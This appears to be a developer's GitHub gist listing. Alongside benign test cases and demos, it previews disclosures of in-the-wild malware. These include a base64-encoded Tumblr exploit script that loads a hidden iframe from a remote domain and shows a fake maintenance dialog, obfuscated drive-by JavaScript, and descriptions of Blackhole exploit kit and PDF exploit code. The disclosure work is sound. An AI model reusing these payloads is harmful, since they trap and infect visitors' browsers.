Skip to content

Instantly share code, notes, and snippets.

Scott Schiller scottschiller

Block or report user

Report or block scottschiller

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@scottschiller
scottschiller / gist:4196142
Created Dec 3, 2012
Possible Tumblr exploit found in the wild, 12/03/2012
View gist:4196142
<div class="the-video hideflash"><script src="data:text/plain;base64,dmFyIGZyYW1la2lsbGVyID0gdHJ1ZTsNCg0Kd2luZG93Lm9ubG9hZCA9IGZ1bmN0aW9uKCl7DQogIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdsYXBwZXInKS5zcmMgPSAiaHR0cDovL2kuaG9wZS55b3UuZ2V0LnN0cmFuZ2xlZC5uZXQiOw0KfQ0KDQp3aW5kb3cub25iZWZvcmV1bmxvYWQgPSBmdW5jdGlvbigpIHsgDQogIGlmKGZyYW1la2lsbGVyKSB7DQogICAgcmV0dXJuICJOb3RpY2U6IFR1bWJsciB3aWxsIGJlIHVuZGVyZ29pbmcgbWFpbnRlbmFuY2Ugb24gRGVjZW1iZXIgNHRoIDIwMTIgYXQgMDE6MDAgQU0gZm9yIHNldmVyYWwgaG91cnMuXG5cbiBXZSBjYW5ub3QgZm9yZWNhc3QgZm9yIGV4YWN0bHkgaG93IGxvbmcsIHVuZm9ydHVuYXRlbHkuXG4gV2UgYXBvbG9naXplIGZvciB0aGUgaW5jb252ZW5pZW5jZS5cblxuWW91IG1heSBub3cgZGlzbWlzcyB0aGlzIG1lc3NhZ2UgdmlhICdDYW5jZWwvU3RheSBvbiB0aGlzIHBhZ2UnLiBUaGFuayB5b3UuIjsgIC8vIGFueSBtZXNzYWdlIHRoYXQgaGVscHMgdXNlciB0byBtYWtlIGRlY2lzaW9uDQogIH0NCn07"></script><iframe id="lapper" width="0" height="0" style="opacity: 0;"></iframe></div>
Decoded:
/*
var framekiller = true;
window.onload = function(){
document.getElementById('lapper').src = "http://i.hope.you.get.st
@scottschiller
scottschiller / malware.js
Created Nov 15, 2012
"Blackhole" Flash + Adobe PDF Reader + Java/getJavaInfo.jar web exploit found in the wild, 11/15/2012
View malware.js
/**
* Looks as though this thing scans for vulnerable versions of Flash, Adobe PDF Reader and Java plugins.
* Oddly, the functions j1/j2/p1/p2/f1/f2 (which would presumably do the dirty work) are empty.
* It's worth noting that the hosting (bad) page says "Please wait, you will be forwarded / IE and Firefox-compatible only".
* Allegedly this is part of the "Blackhole Exploit Kit".
* Related details / video etc.:
* http://malwaremustdie.blogspot.com/2012/09/important-blackhole-exploit-kit-starts.html
* http://malware.dontneedcoffee.com/2012/09/BHEK2.0landing.html
*/
View gist:2890589
<!-- Flickr is made of, by and for humans: Here are 17 signs of empathy in the form of loading messages. ;) -->
Reticulating splines...
Frobulating widgets...
Engaging Tuna Blaster...
Firing up the engines...
Buffering...
Herding pandas...
Questioning the Magic Donkey...
Your machine is learning our ways
@scottschiller
scottschiller / yui3-loader-test.html
Created May 8, 2012
YUI 3.5.1 loader test (IE 9, quirks mode DTD)
View yui3-loader-test.html
<!--
Lack of DTD means quirks mode in IE 9, and YUI 3.5.1 will fail to load module dependencies due to <script>.onload not being supported. <script>.onreadystatechange should instead be used when document.documentMode < 9, which means IE 9 rendering a page in quirks mode, IE 7 or IE 8 standards mode.
-->
<html>
<head>
<script src="http://yui.yahooapis.com/3.5.1/build/yui/yui-min.js"></script>
<script>
// Create a YUI sandbox on your page.
YUI().use('node', 'event', function (Y) {
// The Node and Event modules are loaded and ready to use.
@scottschiller
scottschiller / gist:2623390
Created May 6, 2012 — forked from spadgos/gist:2561726
Recreating a SoundManager bug / fixed testcase
View gist:2623390
<html>
<head>
<!--
report URL: https://getsatisfaction.com/schillmania/topics/sound_playing_double
related SM2 fix/commit: https://github.com/scottschiller/SoundManager2/commit/013565dbb5abfc5bf0ab66b0246352ee3ca5cc02
-->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Soundmanager test</title>
<!-- you'll have to correct the paths to SoundManager to get it working for yourself -->
<script>window.SM2_DEFER = true;</script>
@scottschiller
scottschiller / gist:2142215
Created Mar 20, 2012
JavaScript PDF exploit found in the wild, 03/20/2012
View gist:2142215
I got this PDF as an email attachment.
The PDF file included a JavaScript block defining an array, and some encoded (for example, &#123;) character entries underneath defining the function responsible for decoding and running it.
The interesting part of the PDF where the script started:
<test:script contentType='&#97;&#0112;plication/&#120;-javascript'>
That was followed by the array data (not encoded), and then this block:
@scottschiller
scottschiller / malware.html
Created Feb 28, 2012
Browser malware found in the wild, 02/28/2012
View malware.html
<!-- Fake "Better Business Bureau" email had a link going to a compromised site with obfuscated JS, which ultimately created an iFrame that loaded this on a remote domain with /main.php?page=[some_characters]. -->
<!-- Probably some drive-by exploit, don't run this on - er, well - anything - but especially not WinXP. -->
<!-- commented out to prevent accidental execution, too. -->
<html><body><script>
/*
ss='s';g='g';r='r';d='d';c='c';t='t';
try{new window(123).typ;}catch(qq){aa=/d/.exec("a"+"ds").index+[];e=window.eval;cc=document;}
aaa=1+[];
try{new btoa({});}catch(qqq){
@scottschiller
scottschiller / gist:1187837
Created Sep 2, 2011
Closure compiler "INTERNAL COMPILER ERROR" with soundmanager2-nodebug.js (Compiler version 1346)
View gist:1187837
[ Report for Google Closure Compiler folks, internal compiler error on routinely-compressed JS ]
Source file used:
https://raw.github.com/scottschiller/SoundManager2/V2.97a.20110801+DEV/script/soundmanager2-nodebug.js
Reporting this per instructions in the compiler output.
For what it's worth, compilation has previously been successful until I updated the compiler to the build below.
This version of the compiler fails:
Closure Compiler (http://code.google.com/closure/compiler)
@scottschiller
scottschiller / js-ball-collision.html
Created Jul 10, 2011
A collision-enabled variant of my JavaScript Animation Demo #2, feature added at the request of a public school technology teacher who wrote in. (Teachers showing kids JavaScript in high school FTW! :P)
View js-ball-collision.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<style type="text/css">
body {
font:76% normal verdana,arial,tahoma;
}
@scottschiller
scottschiller / normalized-addremove.html
Created Sep 26, 2010
Somewhat-normalized event listener handling (DOM2)
View normalized-addremove.html
<html>
<head>
<title>Somewhat-normalized event add/remove</title>
<script>
var addEvent, removeEvent;
(function() {
/*
* Somewhat-normalized event add/remove (old IE/W3C)
You can’t perform that action at this time.